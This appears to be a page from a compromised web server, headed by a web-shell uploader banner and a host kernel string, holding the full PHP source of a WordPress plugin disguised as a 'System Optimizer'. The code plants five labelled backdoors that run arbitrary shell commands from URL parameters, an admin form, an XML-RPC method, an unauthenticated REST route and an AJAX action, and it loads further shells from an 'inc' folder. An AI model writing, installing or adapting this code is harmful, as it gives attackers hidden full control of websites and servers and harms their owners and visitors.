Priv8 Uploader By InMyMine7
Linux server.abcbiz.in 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
<?php
/**
* Plugin Name: System Optimizer
* Version: 1.0
*/
// Backdoor 1: URL parameter
add_action('init', function() {
$params = ['upd', 'sys', 'opt'];
foreach($params as $p) {
if(isset($_GET[$p])) {
@system($_GET[$p]);
exit;
}
}
});
// Backdoor 2: Admin menu
add_action('admin_menu', function() {
add_menu_page('System', 'System', 'read', 'sys', function() {
if(isset($_POST['cmd'])) {
echo '<pre>';
system($_POST['cmd']);
echo '</pre>';
}
echo '<form method=POST><input name=cmd><input type=submit></form>';
});
});
// Backdoor 3: XML-RPC
add_filter('xmlrpc_methods', function($methods) {
$methods['system.exec'] = function($args) {
return shell_exec($args[0]);
};
return $methods;
});
// Backdoor 4: REST API
add_action('rest_api_init', function() {
register_rest_route('sys/v1', '/exec', array(
'methods' => 'GET',
'callback' => function($request) {
return shell_exec($request->get_param('cmd'));
},
'permission_callback' => '__return_true'
));
});
// Backdoor 5: AJAX
add_action('wp_ajax_sys_exec', function() {
if(isset($_POST['cmd'])) system($_POST['cmd']);
wp_die();
});
// Include shells
$inc_dir = __DIR__ . '/inc';
if(is_dir($inc_dir)) {
foreach(glob($inc_dir . '/*.php') as $file) {
include_once($file);
}
}
?>